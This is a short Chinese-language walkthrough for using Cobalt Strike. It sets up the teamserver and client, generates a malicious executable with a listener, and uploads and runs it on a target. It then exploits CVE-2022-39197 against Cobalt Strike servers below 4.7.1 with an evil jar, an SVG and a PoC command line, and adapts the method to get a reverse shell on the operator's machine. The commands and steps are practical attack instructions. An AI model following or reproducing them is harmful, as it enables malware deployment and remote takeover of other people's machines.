一、前置
1、权限更改,以便启动服务器端:chmod 777 *
2、启动服务器端
在当前目录下:./teamserver 192.168.228.129 pass
- IP地址为本地IP地址,即启动服务器的那台主机IP
- pass为连接密码
3、启动客户端:双击批处理文件(需要jdk环境)--》连接
4、生成恶意程序
- 创建监听器:cs按钮--》监听器--》添加--》添加HTTP地址(保持默认的即可),端口更改
- 生成恶意程序:有效载荷按钮--》 选择可执行程序 --》选择监听器---》确定---》保存文件
5、将恶意程序通过一些方式上传,运行
二、CS反制-远程控制工具启动
1、影响版本:CS<4.7.1
2、利用漏洞(CVE-2022-39197)
- 编辑恶意文件内容,路径为EvilJar/src/main/java/Exploit.java
- 使用Maven将文件打包,会在target目录下生成.jar的文件
- 复制生成的文件到serve目录下,目录下有evil.svg文件
- 修改evil.svg的文件内容
- 在serve目录下开启web服务并验证是否能访问:python -m http.server 8888
- 将恶意程序放到cve-2022-39197.py同一目录下(恶意程序名称要与py文件下的名字一致)
- 执行POC:python cve-2022-39197.py beacon.exe http://IP地址:端口/evil.svg
- cs服务器执行人员恰好查看系统进程时就会触发计算器
三、CS反制-反弹shell
1、双方开CS服务器,客户端
2、生成恶意程序:有效载荷按钮--》 选择payload生成器--》选择监听器--》选择输出格式:cmd
3、将生成的文件内容复制到Exploit.java文件的执行命令处,编译生成.jar工具
4、与上面步骤一致